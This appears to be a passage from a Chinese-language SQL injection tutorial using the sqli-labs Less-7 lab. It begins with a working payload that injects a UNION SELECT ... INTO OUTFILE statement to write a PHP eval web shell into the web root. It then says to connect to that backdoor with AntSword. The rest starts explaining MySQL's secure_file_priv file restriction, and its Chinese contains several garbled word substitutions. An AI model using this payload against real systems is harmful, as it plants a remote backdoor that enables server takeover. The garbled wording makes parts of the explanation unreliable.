/?id=1')) union select 1,'<?php eval($_POST[x]);?>',3 into outfile 'E:\\phpstudy\\WWW\\sqli\\Less-7\\1.php'--+
复制代码
之后利用蚁剑毗连后门即可
3. secure_file_priv限制
3.1 secure_file_priv简介
高版本的MYSQL添加了一个新的特性secure_file_priv,secure_file_priv 是 MySQL 中用于限制文件操纵的体系变量,主要用于控制和限制数据库服务器对文件的访问权限。具体来说,它限制 LOAD DATA INFILE、SELECT INTO OUTFILE 等语句的操纵范围,确保数据库文件操纵只能在特定的目录中进行,进而增强体系的安全性。